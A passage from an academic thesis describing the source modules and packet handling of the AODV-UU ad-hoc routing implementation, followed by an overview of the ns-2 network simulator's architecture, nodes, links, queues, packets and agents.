was sent may be unreliable or uni-directional. The module offers creation and processing of messages of these two message types. aodv_rreq.{c, h} This module contains RREQ message functionality. It defines the datatype for RREQ messages, offers creation and processing of RREQ messages, and allows route discoveries to be performed. It also offers buffering of received RREQs and blacklisting of RREQs from certain nodes. The blacklisting is used for ignoring RREQs from nodes that have previously failed to receive or acknowledge RREPs correctly, e.g. due to a uni-directional link. aodv_socket.{c, h} This module contains the socket functionality of AODV-UU, responsible for handling AODV control messages. It maintains two separate message buffers; a receive buffer and a send buffer, used for storing an incoming or outgoing message until it has been processed or sent out. Each buffer holds only one (1) message at a time. This is not a problem, since packets are handled one by one, and hence safely can be discarded from the buffers after message processing or sending has completed. The module offers creation of an AODV message (initialization of the send buffer), queueing of an AODV message (copying of message contents to the send buffer) and processing of a received packet. The packet 19 29 processing function checks the type field of the packet, converts it to the appropriate message type and calls the correct handler function, e.g. rrep_process() of the aodv_rrep module if the message is a RREP message. aodv_timeout.{c, h} This module contains handler functions for timeouts, i.e., functions that are called when certain pre-determined events occur. The handler functions receive a pointer to the affected object, e.g. a routing table entry, as a parameter. Handler functions are defined for the following events: Route deletion timeout: This timeout occurs when a route has not been used for a certain period of time. This deletes the route from the internal routing table of AODV-UU. Route discovery timeout: This timeout occurs when route discovery was requested, but a route was not found within a certain amount of time. If the expanding ring search option is enabled, this results in a new route discovery with a larger TTL value than in the previous attempt. Otherwise the packet is dropped, an ICMP Destination Host Unreachable message is sent to the application and the destination is removed from the list of destinations for which AODV-UU is seeking routes. Route expiry timeout: This timeout occurs when the lifetime of a route has expired. This marks the route as down, creates a RERR message regarding unreachable destinations and sends the RERR message to affected nodes. HELLO timeout: This timeout occurs when HELLO messages from a node stop being received. This timeout occurs on an individual basis for each affected route, and is treated as a link failure, i.e., the route expiry timeout handler function is called. RREQ record timeout: This timeout occurs when a RREQ message has become old enough that subsequent RREQs from the affected node with a certain RREQ ID should not be considered as duplicates (i.e., being discarded if received) anymore. RREQ blacklist timeout: This timeout occurs when RREQs from a certain node should not be ignored anymore. Nodes end up in the blacklist by repeatedly sending RREQs for a certain destination, even though RREPs have been sent back to the requesting node. (The cause for this could e.g. be unidirectional links.) The RREQ blacklist timeout handler function removes a node from this blacklist so that normal operation is resumed. RREP-ACK timeout: If RREPs are sent over an unreliable or uni-directional link, a RREP-ACK can be requested by the sending node. If no RREP-ACK is received within a certain time period, this timeout occurs. The result is that the node that failed to reply with a RREP-ACK is added to the RREQ blacklist, described earlier. Wait-on-reboot timeout: This timeout occurs when the 15-second wait-on-reboot phase at startup has elapsed. It resumes active operation of the node, i.e., re-enables transmission of RREP messages. debug.{c, h} This module contains the logging functionality of AODV-UU. It offers logging of general events to a logfile as well as routing table logging to a routing table logfile. It also contains functions for converting IP addresses and AODV message flags to strings, for the purpose of printing and logging. Logging of all general events is performed by a special logging function which examines the severity of the log message, checks the current log settings, and writes log messages to the appropriate logfiles. By default, log messages are also written to the console. Routing table logging is performed by periodically dumping the contents of the routing table to a routing table logfile. Finally, debug-purpose logging is done through a special DEBUG macro in the source code. Such logging will only be effective if AODV-UU has been compiled with the DEBUG option set. 20 30 defs.h This header file contains macros and datatypes used throughout AODV-UU, and hence, almost all the other modules include it. A brief listing of the contents can be found below. AODV-UU version number: Used by the main program (main.c) for displaying the program version number. Logfile and routing logfile paths: By default, these are set to /var/log/aodvd.log and /var/log/aodvd_ rt.log. A definition of infinity, and infinity checking: Used for marking a route as down, by setting its corresponding hop count to this value. An infinity checking macro allows for easy testing of values against this infinity value. Maximum number of interfaces: The maximum number of network interfaces supported by AODV-UU. A datatype for host information: The host_info datatype contains information about a host, i.e., its latest used sequence number, latest time of broadcast, RREQ ID, Internet gateway mode setting, number of network interfaces attached to the host and an array of corresponding network devices. A datatype for network devices: The dev_info datatype contains information about a network device, i.e., its status, socket, index number (for addressing into the array of network devices), name, IP address, netmask and broadcast address. Macros for retrieving network device information: The macros DEV_IFINDEX(ifindex) and DEV_ NR(n) are useful when network device information is needed. DEV_IFINDEX(ifindex) allows for retrieval of the network device information based on an interface index, as defined by the operating system. It translates this interface index into a network device number, and retrieves the network device information from the host information of the current host. DEV_NR(n) instead directly retrieves network device information from the host information of the current host; it indexes into the network device array and retrieves the network device information from there. AODV message types: The different message types used by AODV-UU (AODV_HELLO, AODV_RREQ, AODV_RREP, AODV_RERR and AODV_RREP_ACK) are associated with unique message type numbers. The AODV message type: This is the message type for AODV messages in AODV-UU. It contains a type field followed by space for type-specific data, i.e., enough space to hold any type of AODV message. All AODV messages in AODV-UU, such as RREQs, RREPs and RERRs, will be type casted to this general message type before they are sent out. Similarly, since the type field indicates the type of the message, received AODV messages can be type casted back to their corresponding specialized type and processed correctly. Macros to access AODV extensions: Macros used for accessing AODV message extensions, i.e., extra information included with AODV messages, such as neighbor set information. A type definition for callback functions: This type definition specifies that callback functions used for socket communication are arbitrary functions taking an integer as an argument (used for passing file descriptors to message handling functions). icmp.{c, h} This module contains functionality for sending an ICMP Destination Host Unreachable message to the application if route lookup fails for some destination. 21 31 main.c This is the main program of AODV-UU. It handles initialization of the other modules, kernel module loading and host initialization, and uses select() to wait for incoming messages on sockets. packet_input.{c, h} This module handles communication with the AODV-UU kernel module, kaodv. All packets arriving from the kernel module, both incoming and outgoing packets, will be processed by the packet_input() function. However, AODV control messages will be ignored, since these are handled separately by socket communication in the aodv_socket module. Route discovery and packet buffering is performed as needed. If a packet is destined for another node, and an active route to that node is available, the packet is forwarded using the next hop information from the routing table. packet_queue.{c, h} This module handles queueing (buffering) of packets. Each packet from Netfilter is associated with a unique packet ID, and these IDs are queued in a FIFO queue. Hence, the module performs a light-weight queueing of packets. As soon as AODV-UU has decided on an action for a packet, that packet can be removed from the queue. The packet ID together with a verdict is then returned through the libipq module to Netfilter, which carries out the requested action. The functionality of the packet_queue module allows individual packets to be added, sent or dropped, or all packets in the queue to be destroyed (dropped). params.h This header file contains the following constants, defined by the AODV draft [7]: ACTIVE_ROUTE_TIMEOUT: The lifetime of an active route. TTL_START: Initial TTL value to be used for RREQs. DELETE_PERIOD: Time to wait after expiry of a routing table entry before it is expunged, i.e., deleted. ALLOWED_HELLO_LOSS: Maximum loss of anticipated HELLO messages before the link to that node is considered to be broken. BLACKLIST_TIMEOUT: Timeout for nodes that are part of this node s RREQ blacklist. HELLO_INTERVAL: Interval between broadcasts of HELLO messages. LOCAL_ADD_TTL: Used in the calculation of TTL values for RREQs during local repair. MAX_REPAIR_TTL: Maximum number of hops to a destination for which local repair is to be performed. MY_ROUTE_TIMEOUT: Time period for which a route, advertised in a RREP message, is valid. NET_DIAMETER: The maximum diameter of the network. This value will be used as an upper bound for RREQ TTL values. NEXT_HOP_WAIT: Time to wait for transmission by a next-hop node when attempting to utilize passive acknowledgements (i.e., overhearing of network traffic). NODE_TRAVERSAL_TIME: Conservative, estimated average of the one-hop traversal time for packets. NET_TRAVERSAL_TIME: Estimated time that it takes for a packet to traverse the network. 22 32 PATH_TRAVERSAL_TIME: Time used for buffering RREQs and waiting for RREPs. RREQ_RETRIES: Maximum number of RREQ transmission retries to find a route. TTL_INCREMENT: Incrementation of the TTL value in each pass of expanding ring search. TTL_THRESHOLD: When the TTL value for RREQs in expanding ring search has passed this value, it should be set to NET_DIAMETER (instead of continuing the stepwise incrementation). K: This constant should be set according to characteristics of the underlying link layer. A node is assumed to invariably receive at least one out of K subsequent HELLO messages from a neighbor if the link is working and the neighbor is sending no other traffic. routing_table.{c, h} This module contains routing table functionality. It defines the datatypes for routing table entries and precursors, both containing pointers to another element of the same type. That way, entries can form a linked list. Each routing table entry contains the following information: Destination IP Address Destination Sequence Number Interface (network interface index) Hop Count Last Hop Count Next Hop A list of precursors Lifetime Routing Flags (forward route, reverse route, neighbor, uni-directional and local repair) A timer associated with the entry RREP-ACK timer for the destination HELLO timer Last HELLO time HELLO count A hash value (for quickly locating the entry) A pointer to subsequent routing table entries The operations offered by this module are the initialization and cleanup of the routing table, route addition, route modification, route timeout modification, route lookup, active route lookup, route invalidation, route deletion, precursor addition and precursor removal. As routes are added, updated, invalidated or deleted, the kernel routing table of the system is updated accordingly. This is done through calls to kernel routing table functions of the k_route module. 23 33 seek_list.{c, h} This module contains management of the seeking list, i.e., the list of destinations for which AODV-UU is seeking routes. The seeking list is a linked list of entries, each containing the following information: The Destination IP address The Destination Sequence Number Flags (used for resending RREQs) Number of RREQs issued The TTL value to use for RREQs IP data (for generating an ICMP Destination Host Unreachable message to the application if route discovery fails) A seeking timer A pointer to subsequent seeking list entries Entries may be added to or removed from the seeking list as needed. Seeking list entries can also be searched for, by specifying their destination IP addresses. timer_queue.{c, h} This module contains the timer functionality of AODV-UU. It defines a datatype for timers, containing an expiry time, a pointer to a handler function, a pointer to data (used by the handler function), a boolean value indicating timer usage, and a pointer to other timers. Timers are added to a timer queue, represented by a linked list. This list is sorted, with the timer that will expire first at the head of the list. The timer queue can be aged, i.e., checked for expired timers. During aging, the handler functions of expired timers are called in sequence, with the specified data pointer (e.g. a pointer to a routing table entry) being passed as an argument. This allows the handler functions to be context-aware. Aging of the timer queue also updates the select() timeout used by AODV-UU while waiting for incoming messages on sockets. The new timeout of this select() timer is taken from the timer at the head of the timer queue Kernel-related modules kaodv.c This module is the kernel module of AODV-UU. It registers a packet handling function on three Netfilter hooks; NF_IP_PRE_ROUTING (for handling incoming packets prior to routing), NF_IP_LOCAL_OUT (for handling locally generated packets) and NF_IP_POST_ROUTING (for re-routing packets prior to sending them). Packets arriving on the NF_IP_PRE_ROUTING or NF_IP_LOCAL_OUT hook are queued in user-space, to allow AODV-UU to process them. Packets arriving on the NF_IP_POST_ROUTING hook, i.e., packets that should be sent out by the system, are re-routed to ensure usage of the latest routing information available from the kernel routing table. (Recall that the kernel routing table may have changed as an effect of AODV-UU operation, e.g. route discoveries.) k_route.{c, h} This module contains functionality for modifying the kernel routing table of the system. Routes may be added, changed or deleted. The kernel routing table modifications are carried out by ioctl() calls. 24 34 libipq.{c, h} This module, developed by the Netfilter core team, contains the functionality for user-space queueing of IP packets. It uses a netlink socket to communicate with Netfilter, and allows user-space packet handling callback functions to be called whenever a queued packet arrives. AODV-UU uses the libipq module for receiving packets and returning verdicts for packets from user-space. 4.6 Packet handling In this section, the packet handling of AODV-UU is described. Roughly, it distinguishes between data packets and AODV control messages, and handles them separately using different software modules. This is shown in Figure 4.2. Network Protocol Stack AODV control messages Kernel kaodv Netfilter hooks Netfilter 654 UDP socket Kernel space User space netlink socket libipq packet_queue packet_input aodv_socket Misc. modules aodv_hello aodv_rerr aodv_rrep aodv_rreq Figure 4.2: Packet handling of AODV-UU. Data packets and AODV control messages are handled separately Packet arrival When a packet traverses the protocol stack, it is caught by the Netfilter hooks that have been set up by the AODV-UU kernel module, kaodv. The nf_aodv_hook() function of the kaodv module identifies the packet type, and either tells Netfilter to accept the packet (i.e., to let it through and allow the system to process it on its own) or to queue it (for further processing by AODV-UU in user-space). Non-IP packets are always accepted, since these packets are of no interest to AODV-UU. Locally generated packets are always queued, since a route may have to be determined for those. Incoming AODV control messages are always accepted, since these eventually should be processed on a separate UDP socket and must be let through in order to be able to arrive there. Also, only packets on AODV-UU-enabled network interfaces should be processed by AODV-UU. Packets on other network interfaces are therefore immediately accepted, and not processed further. 25 35 4.6.2 Initial packet processing Packet processing is performed by the packet_input() function of the packet_input module. If the packet is an AODV control message, an accept verdict is returned to the libipq module so that the packet eventually will end up on the AODV control message UDP socket, to be received or sent out, depending on whether the packet is an incoming or outgoing packet. Otherwise, the packet is analyzed further Data packet processing If the destination of the packet (determined by its destination IP address) is the current host, the packet is a broadcast packet, or Internet gateway mode has been enabled and the packet is not a broadcast within the current subnet, the packet is accepted. This means that the packet under these circumstances will be handled as usual by the operating system. Otherwise, the packet should either be forwarded, queued or dropped. The internal routing table of AODV-UU is used for checking whether an active route to the specified destination exists or not. If such a route exists, the next hop of the packet is set and the packet is forwarded. Otherwise, provided that the packet was generated locally, the unique packet ID provided by the libipq module is used by the packet_queue module for indirectly queueing the packet until AODV-UU has decided on an action, and a route discovery is initiated. If the packet was not generated locally, and no route was found, it is instead dropped and a RERR message is sent to the source of the packet AODV control message processing AODV control messages are received on a UDP socket (on port 654) and processed by the aodv_socket module. The type field of the AODV message is checked, the message is converted to the corresponding specialized message type, and the correct handler function is called in the appropriate module AODV control message sending Each AODV control message generated by AODV-UU is sent out on the AODV control message UDP socket. Such a message will be caught by the Netfilter hook for locally generated packets, NF_IP_LOCAL_OUT, queued by the kaodv module and received by the packet_input module of AODV-UU through libipq. The packet_input module will return an accept verdict to libipq, and the packet will then be caught by the postrouting Netfilter hook, NF_IP_POST_ROUTING. The packet is re-routed to ensure usage of the most recent routing information, and sent out by the system. 4.7 Current status AODV-UU has successfully been tested together with other AODV implementations during an AODV interop [39] in March 2002, with good results. These results can be attributed to the large amount of dedicated work that has been put into the development of AODV-UU. Currently (September 2002), AODV-UU is undergoing some minor changes to adapt it to the very latest AODV draft (version 11) [7]. A new version of AODV-UU (version 0.6) is expected to appear soon, and hopefully, a technical report on AODV-UU will also be prepared in the near future. 26 36 Chapter 5 The ns-2 Network Simulator 5.1 Introduction The network simulator ns-2 [8] is an object-oriented, discrete event-driven network simulator developed at UC Berkeley and USC ISI as part of the VINT project [41]. It is a very useful tool for conducting networks simulations involving local and wide area networks, but its functionality has grown during recent years to include wireless networks and ad-hoc networking as well. The ns-2 network simulator has gained an enormous popularity among participants of the research community, mainly because of its simplicity and modularity. It allows simulation scripts, also called simulation scenarios, to be easily written in a script-like programming language, OTcl. More complex functionality relies on C++ code that either comes with ns-2 or is supplied by the user. This flexibility makes it easy to enhance the simulation environment as needed, although most common parts are already built-in, such as wired nodes, mobile nodes, links, queues, agents (protocols) and applications. Most network components can be configured in detail, and models for traffic patterns and errors can be applied to a simulation to increase its reality. There even exists an emulation feature, allowing the simulator to interact with a real network. Simulations in ns-2 can be logged to trace files, which include detailed information about packets in the simulation and allow for post-run processing with some analysis tool. It is also possible to let ns-2 generate a special trace file that can be used by NAM (Network Animator), a visualization tool that is part of the ns-2 distribution. This allows simulations to be replayed on screen, which can be useful for complex simulations. A large amount of documentation exists for ns-2, including a reference manual [40], several tutorials such as [56], and an ns-users mailing list [57]. The intention of this chapter is to provide an overview of the ns-2 network simulator and to illustrate the usage of some of its network components in particular those that are important for the porting of AODV-UU described in Chapter 6. For this reason, the sections on agents and mobile networking have been given a substantial amount of space. Finally, the descriptions of trace file formats in section complement the almost non-existent documentation on this topic found in the ns-2 manual. The version of ns-2 described here is version 2.1b9, and the ns-2 distribution used is the ns-allinone distribution, version 2.1b9. The notion ns followed by a path and a filename refers to the corresponding file in the ns-2 source code tree. The complete source code of ns-2 is available from the ns-2 homepage [8]. 5.2 Performing simulations The starting point for performing simulations in ns-2 is to build an OTcl simulation scenario script file that specifies the components to be used and the events that should occur. An example scenario could e.g. set up a network topology consisting of two nodes, connect these two using a 10 Mbps duplex link, set up FTP traffic over TCP, and start and stop this traffic at certain points in time Main building blocks In general, a simulation scenario consists of three main components: 27 37 A network topology Connections, traffic and agents (protocols) Events and failures A network topology defines the number of nodes and their connectivity, and can either be created manually or with special topology generators such as GT-ITM [42]. Connections and traffic are set up by traffic generators and agents (protocols) at a node. Events and failures include connection set-ups/tear-downs, packet flow, packet loss, congestion and mobile node movements Simulation scenario contents The contents of most simulation scenario scripts follow a certain pattern. This is due to the fact that some general setup is common to almost all scenarios. A typical simulation scenario script will include (in order): Creation of a simulator instance. A simulator instance is needed for any simulation to be performed. Opening of trace files, both a normal trace file and a NAM (Network Animator) trace file. Configuration of nodes, i.e., setting of parameters that will be used when nodes are created. Creation of nodes and links, and connection of nodes using these links. Creation of agents and applications, and attachment (installation) of these. Scheduling of traffic-related events, e.g. starting or stopping of a traffic generator or agent. A finish procedure to be called at the end of simulation. This procedure should flush any trace file output and exit the simulator. Scheduling of a call to the finish procedure at the end of the simulation. Starting of the simulation, by issuing a run command to the simulator instance Simulation execution and analysis A simulation scenario script is executed (i.e., a simulation is performed) by supplying the file name on the command line to the ns-2 simulator. The simulator acts as an OTcl interpreter, interpreting the simulation scenario script line by line. Any error messages or messages generated by the script will be printed to the console. When the simulation has finished, the simulator exits and the command shell prompt returns. No graphical user interface is supplied with ns-2 for performing simulations. After successfully performing a simulation, the trace files that may have been produced by the simulation scenario script can be analyzed. Depending on the objectives of the simulation, this can either be done with a full-fledged analysis tool such as Trace graph [43] or with simpler, hand-made scripts (usually Perl, sed or awk scripts) or programs. 5.3 The OTcl/C++ environment To increase flexibility and efficiency, ns-2 uses two programming languages for its operation; C++ and OTcl. C++ is mainly used for event handling and per-packet processing; tasks for which OTcl would become too slow. OTcl is commonly used for simpler routing protocols, general ns-2 code and simulation scenario scripts. The usage of OTcl for simulation scenario scripts allows the user to change parameters of a simulation without having to recompile any source code. 28 38 The two programming languages are tied together in the sense that C++ objects can be made available to the OTcl environment (and vice versa) through an OTcl linkage. This linkage creates OTcl objects for C++ objects and allows variables of C++ objects to be shared as well. In addition, it offers access to the OTcl interpreter from C++ code. This makes it possible to implement network components in OTcl, C++ or both. Furthermore, these components can easily be configured from the simulation scenario script because of the OTcl linkage, so the choice of programming language used for the implementation is completely transparent to the user. 5.4 Class hierarchy To provide a better understanding of the characteristics of network components in ns-2, a partial ns-2 class hierarchy is shown in Figure 5.1. TclObject Other Objects NsObject Connector Classifier SnoopQueue Queue Delay Agent Trace AddrClassifier McastClassifier DropTail RED TCP UDP Figure 5.1: Partial ns-2 class hierarchy The root of the hierarchy is the TclObject class, which is the superclass of all library objects in OTcl, i.e., schedulers, network components, timers and other objects. The NsObject class forms a superclass for all basic network component objects that handle packets. Basic network components may be compound to form more complex network objects such as nodes and links. The basic network components are divided into two subclasses, Connector and Classifier, based on the number of possible output data paths. Basic network components with only one output data path are placed under the Connector class, while switching objects that have multiple possible output data paths instead are placed under the Classifier class. 5.5 Event scheduling Event scheduling in ns-2 is handled by a discrete event scheduler, used e.g. by simulation scenario scripts and network components that simulate packet-handling delays or use timers for their operation. There are two different types of event schedulers; real-time and non-real-time schedulers. The real-time scheduler RealTime is used for emulation, i.e., live interaction between the simulator and a real network. For non-real-time purposes, the three schedulers List, Heap and Calendar are available, of 29 39 which the Calendar scheduler is the default. These mainly differ in the way that they store events, yielding different time complexities. An event scheduler keeps track of the time, an event ID and a handler for each event. When an event should be carried out, the specified handler is called, as shown in Figure 5.2. Handlers in this context are handler methods of C++ objects of the Handler class. Events are executed to completion one by one, i.e., no preemption is supported. If several events are scheduled to occur at the same time, they are executed in a first scheduled - first dispatched manner. head Event Queue time_, uid_, next_, handler_ Event Handling Network Object handle() Event Insertion time_, uid_, next_, handler_ Figure 5.2: Discrete event scheduling in ns-2. The event scheduler calls the handler function of a network component at the specified time of the event. Event scheduling is indirectly made available to network components of ns-2 through the use of timers, described in section 5.12, or through access to an instance of the OTcl interpreter, as mentioned in section 5.3. Simulation scenario scripts may schedule events through the simulator instance by using the at <time> "<OTcl command>" command. 5.6 Packet delivery Packet delivery in ns-2 is built on the concept of network objects (components) interacting with each other. Packets are generated e.g. by agents or traffic generators, and delivered through links from one node to another. In each step of the packet delivery process, a network object sends the packet using a send method, which invokes the recv (receive) method of another network object. This is shown in Figure 5.3. send(packet *p, Handler *h) { target_ = recv(p, h); } Network Object Network Object recv(packet *p, Handler *h) Figure 5.3: Packet delivery in ns-2. A network object sends a packet to another network object by invoking its receive method. For packet delivery to take place, a reference to the receiving network object is needed. This, however, is not a problem. All plumbing-work involving network objects is performed in the simulation scenario script, and hence, all references to network objects are known. 30 40 5.7 Nodes Nodes are fundamental in a simulation. They perform processing and forwarding of packets, and are therefore perhaps the most important entities among all network components of ns-2. This section mainly deals with unicast nodes that have a wired connection to the network; wireless nodes are described in section 5.15, and details on multicast nodes can be found in [40] Node basics A wired unicast node is a compound object composed of a node entry object and two classifiers, as shown in Figure 5.4. The node entry is where packets first arrive. The address classifier examines the address field of a packet to determine whether the packet is destined for the current node. Finally, the port classifier determines which agent (protocol) at the node that should receive the packet. Generated Packets Agent Link (in) Node Entry Address Classifier Port Classifier Unicast Node Link (out) Figure 5.4: Composite construction of a wired unicast node If the packet is not destined for the current node, the address classifier determines which node that the packet should be forwarded to. This is possible because of routing functionality in the node constantly updating the address classifier. Packets are forwarded to other nodes through links to these nodes Node configuration and creation Prior to creating nodes, the desired node configuration must be given to the simulator instance. This is done by issuing a node-config command to the simulator instance, and passing the configuration options as arguments. Table 5.1 lists some of the available options for node configuration. If no configuration is made, default values apply, i.e., it is assumed that wired nodes with a flat addressing scheme (where nodes are simply numbered from zero and up) should be used. To illustrate the node-config command, an example configuration of a wireless ad-hoc node is shown below: oinstance $topo \ 31 41 Table 5.1: Selected options for node configuration. A dash (-) indicates that the value is not set by default.!" -addresstype flat, hierarchical flat -wiredrouting ON, OFF OFF -lltype LL, LL/Sat - -mactype Mac/802_11, Mac/Csma/Ca, Mac/Sat, - Mac/Sat/UnslottedAloha, Mac/Tdma -ifqtype Queue/DropTail, Queue/DropTail/PriQueue - -ifqlen <length> - -phytype Phy/WirelessPhy, Phy/Sat - -adhocrouting DIFFUSION/RATE, DIFFUSION/PROB, - DSDV, DSR, FLOODING, OMNICAST, AODV, TORA -proptype Propagation/TwoRayGround, - Propagation/Shadowing, Propagation/FreeSpace -propinstance Propagation/TwoRayGround, - Propagation/Shadowing -anttype Antenna/OmniAntenna - -channel Channel/WirelessChannel, Channel/Sat - -topoinstance <topology file> - -mobileip ON, OFF OFF -rxpower <value in W> - -txpower <value in W> - -idlepower <value in W> - -agenttrace ON, OFF OFF -routertrace ON, OFF OFF -mactrace ON, OFF OFF -movementtrace ON, OFF OFF -IncomingErrProc <error model instantiator> - -OutgoingErrProc <error model instantiator> - 32 42 -channel Channel/WirelessChannel \ -agenttrace ON \ -routertrace ON \ -mactrace ON \ -movementtrace ON After performing node configuration, nodes may be created by issuing a node command to the simulator instance. This command creates a node using the current node configuration options. If nodes with different characteristics are needed, the node configuration procedure may be repeated, and more nodes created Node addressing Node addresses in ns-2 consist of two parts; node IDs and port IDs. Both are 32-bit fields, which together constitute a complete address. Two addressing modes are available that determine how addresses should be interpreted. In flat addressing, each node gets assigned a node ID at the time of creation, starting from zero and increasing. This means that the addressing scheme simply becomes a node numbering scheme without any further interpretation of addresses. In hierarchical addressing, the node ID is instead divided into different hierarchy levels, with a specific number of bits used for each level. The node addressing mode is configured using the node-config command of the simulator instance Routing Routing in nodes is performed by routing modules, consisting of a routing agent, route logic and classifiers. Routing agents exchange routing packets with neighbors, route logic uses the information gathered by routing agents to perform the computation of a route and classifiers use the computed routing table to carry out the actual packet forwarding. A routing module initializes its connection to a node by registering itself to the node with a special registration command. During this registration, the routing module tells the node whether it is interested in knowing about route updates and transport agent attachments, and creates and installs classifiers inside the node. Currently, there are six routing modules available. These are listed in Table 5.2. Table 5.2: Available routing modules RtModule/Base RtModule/Mcast RtModule/Hier RtModule/Manual RtModule/VC RtModule/MPLS Interface to unicast routing protocols. Provides basic functionality to add/delete routes and attach/detach agents. Interface to multicast routing protocols. Establishes multicast classifiers. Hierarchical routing. A wrapper for managing hierarchical classifiers and route installation. Manual routing, i.e., manual addition and deletion of routes. Uses a virtual classifier instead of a vanilla classifier for forwarding packets. Implements MPLS (Multi-Protocol Label Switching) routing. 5.8 Links A link is a compound object composed of a sequence of connectors, as shown in Figure 5.5. Connectors, unlike classifiers, only generate data for one recipient; either the packet is delivered to the target (output) of the connector, or it is dropped to a drop target. 33 43 head_ enqt_ queue_ deqt_ link_ ttl_ rcvt_ drophead_ drpt_ Figure 5.5: Composite construction of a uni-directional link Links are defined by five instance variables. head_ is the entry point to the link, pointing to the first object in the link. queue_ is a reference to the main queue element of the link. Although simple links only contain one queue, more complex links may have multiple queues. link_ is a reference to the element that actually models the link, giving it its delay and bandwidth characteristics, and ttl_ is a reference to the element that manipulates the TTL field in every packet. Finally, drophead_ is a reference to an object that is the head of a queue of elements that process link drops. Links also allow packets to be monitored more closely. By using the trace-all command of the simulator instance (see section ), trace elements enqt_ and deqt_ are added to track when a packet is enqueued or dequeued from queue_. Also, drpt_ allows dropped packets to be traced, and rcvt_ allows packets to be traced at the end of a link. Creation and configuration of links is provided by the simulator instance. By issuing a simplex-link command to the simulator instance, a simplex link is created between two nodes with certain bandwidth, delay and queue type characteristics. Similarly, duplex links are created with the duplex-link command. To model connectivity changes, links offer a dynamic mode that is selected by issuing a dynamic command. After this command has been issued to a link, the status of that link can be changed by issuing up and down commands. In dynamic mode, links also offer an up? command for checking the status of a link. The cost for a packet to traverse a link, which defaults to 1, can be set using the cost command. This value is used by the route logic of routing modules when calculating routes. Other useful commands for links include errormodule, which inserts an error model before the queue element of a link to model errors in packets, and insert-linkloss, which inserts an error model after the queue element of a link to model link loss. Error models and their installation is described further in section Queues Queues are objects that hold or drop packets, and are used e.g. in links and interface queues in wireless networking. Currently, ns-2 includes support for drop-tail (FIFO) queueing, RED buffer management, classbased queueing and several variants of fair queueing. Some of the available queue types are listed below, along with their respective OTcl class names. Queue/DropTail queues implement simple FIFO queues. A subclass of this queue type, PriQueue, allows packets to be prioritized based on their packet type. Queue/FQ queues implement fair queueing. Queue/SFQ queues implement stochastic fair queueing. Queue/DRR queues implement deficit round robin scheduling, and support multiple flows. Queue/RED queues implement random early-detection gateways, which can be configured to either mark or drop packets. Queue/CBQ queues implement class-based queueing, in which packets can be associated with traffic classes based on their IP header flow IDs. 34 44 5.10 Packets Packets are the fundamental unit of exchange between objects in a simulation. They are built up of packet headers, corresponding to different protocols that may be used, and packet data. Access to the different packet headers and the data portion of a packet is made available through access methods. This is shown in Figure 5.6. New protocols may add their own packet header types to the available ones, and unused packet headers may be turned off to save memory during simulations. Packet next_ accessdata() hdrsize_ bits() Next packet Packet data Common header IP header size determined at simulator startup TCP header RTP header Trace header Figure 5.6: Packet contents. Each packet is built of packet headers and packet data Packet types and headers Packet types are defined in ns/common/packet.h. An enumeration of packet types is provided by the packet_t enumeration, and a p_info class provides the mapping to packet type names: enum packet_t { PT_TCP,... PT_NTYPE }; class p_info { public: p_info() { name_[pt_tcp] = "tcp";... name_[pt_ntype]= "undefined"; } } At the beginning of a simulation, the available packet types are reviewed by the PacketHeaderManager OTcl class to assign each packet type a unique offset in packets. This offset is stored in a static offset_ variable of each packet header class, and is used by the access() methods of these classes to provide a 35 45 pointer into the packet where that packet header begins. Usually, packet header classes also supply access macros to simplify packet header access even further. Unused packet headers may selectively be disabled by issuing a remove-packet-header command in OTcl before any simulator instance is created. For large simulations with lots of traffic, this could save a considerable amount of resources (most notably, memory) The common header The only mandatory packet header in ns-2 is the common header, hdr_cmn, mainly used for tracing packets and measuring other quantities during a simulation. The most important fields of this header are: ptype_, the packet type. uid_, a unique packet ID. size_, the simulated packet size. ts_, the timestamp of the packet. This field is used for queue delay measurements. error_, an error flag indicating whether the packet is corrupted or not. errbitcnt_, the number of corrupted bits in the packet. direction_, the direction of the packet during network stack traversal. prev_hop_, the address of the previous hop. Used for hop-by-hop routing in wireless simulations. next_hop_, the address of the next hop. Used for hop-by-hop routing in wireless simulations. num_forwards_, the number of times that a packet has been forwarded (used in wireless simulations). iface_, the label of the receiving interface. The ptype_ field is used for packet type identification in trace logs, making them easier to read. The uid_ field is used by the scheduler for scheduling packet arrivals. The size_ field specifies the size of a simulated packet in bytes. It is used for computing the time it takes for a packet to be delivered over a link, and should therefore be set to be the sum of the sizes of application data, IP-, transport- and application-level headers. The error_ and errbitcnt_ fields are used for indicating the degree of packet corruption. The direction_ and next_hop_ fields are particularly important in wireless simulations. Finally, the iface_ field is used by the simulator when performing computations of multicast distribution trees, and indicates on which link a packet was received Packet allocation and de-allocation Packets are allocated on demand by calling the alloc() method of the Packet class. This reserves memory for a new packet, and returns a pointer to the packet. However, when packets are de-allocated using the free() method of the Packet class, they are not removed from memory but instead stored on a private list of free packets, to be reused when subsequent packet allocations are requested. This avoids memory fragmentation Agents Agents represent endpoints where packets are generated or consumed, and are used for implementing protocols at various layers. Routing agents and traffic sinks are some examples of agents that are frequently used in simulations. The OTcl class Agent and the C++ Agent class together implement agents in ns-2. The source code can be found in ns/common/agent.{cc, h} and ns/tcl/lib/ns-agent.tcl. Here, we will consider C++ agents only, since OTcl packet handling generally is not recommended (due to performance issues). 36 46 Agent state information Each agent holds a certain amount of state information, mainly to be able to assign default values to packet fields when generating packets, and to identify itself. Table 5.3 shows the state information kept for each agent. Table 5.3: Agent state information agent_addr_ agent_port_ dst_addr_ dst_port_ type_ size_ ttl_ fid_ prio_ flags_ Address of this agent Port number of this agent Address of destination agent Port number of destination agent Packet type Packet size (in bytes) Default IP TTL value IP flow identifier IP priority field Packet flags Agent packet methods Agents offer two methods for generating packets, Packet *allocpkt() and Packet *allocpkt(int). These methods allocate space for a new packet, and assign default values to its packet fields using the state information of the agent. The latter method also makes room for a data payload. Packets may be sent out with the void send(packet *p, Handler *h) method, which hands them to the default target of the agent. Usually, this is the node entry of the node that the agent is attached to. Packet reception is available through a void recv(packet *p, Handler *h) method, which will receive all packets destined for the agent. The handler argument is usually ignored by agents Agent attachment Agents are attached to nodes by issuing an attach-agent <node> <agent> command to the simulator instance. This installs an agent in the port classifier of the node, using the agent s designated port number, agent_port_. After attaching an agent to a node, the agent will receive all packets destined for it, i.e., all packets whose port number matches the port number of the agent. The delivery of packets to agents is carried out by the port classifier of a node. Routing agents are somewhat special, since they require more steps to be installed in a node. For instance, routing agents should usually be installed as the default target of the address classifier of a node to perform forwarding of packets. Such installation details are taken care of by existing OTcl support code (e.g. during node creation), and are not described here Connecting agents To allow two agents attached to different nodes to communicate, the simulator instance offers a connect <src> <dst> command for connecting them with each other. This command sets the destination address and destination port of one agent to be the address and port of the other agent (and vice versa). This arranges for communication 